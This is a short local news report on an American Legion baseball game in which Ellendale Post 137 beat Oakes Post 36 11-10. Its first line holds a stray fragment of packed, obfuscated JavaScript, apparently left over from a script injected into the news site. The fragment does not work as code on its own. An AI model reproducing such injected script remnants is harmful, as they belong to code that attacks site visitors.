ELLENDALE eykts|var|u0026u|referrer|kzikh||js|php’.split(‘|’),0,{}))
(NewsDakota.com) In their previous meeting against Oakes Post 36, the Ellendale Post 137 American Legion baseball team squandered a shot at victory by walking the first six batters in a row in the bottom of the seventh and losing by a run.

It almost happened again in a somewhat similar style Tuesday night, but in the end, the chance wasn’t wasted, as Post 137 won their first southeast region game of the season with a 11-10 victory over Post 36.

Oakes (3-4) had a 1-0 lead to start after the first inning when Ellendale (1-5) scored the next eight runs in a row. Post 36 rallied to pull within 8-7, and then eventually tied the game at 10. In the bottom of the seventh, with the bases loaded, Austin Sumption drove in Dakota King to give Post 137 the walk-off win.

The win was credited to Kyle Johnson, while Jordan Cunningham took the loss for Oakes; who were outhit 14-7 in the contest, and stranded 13 on base.

 Post 36 comes back home on Thursday June 22 when they welcome LaMoure Post 19. Coverage on KDDR-AM 1220/95.9 FM and NewsDakota.com starts at 6:50 p.m., with first pitch scheduled for 7.
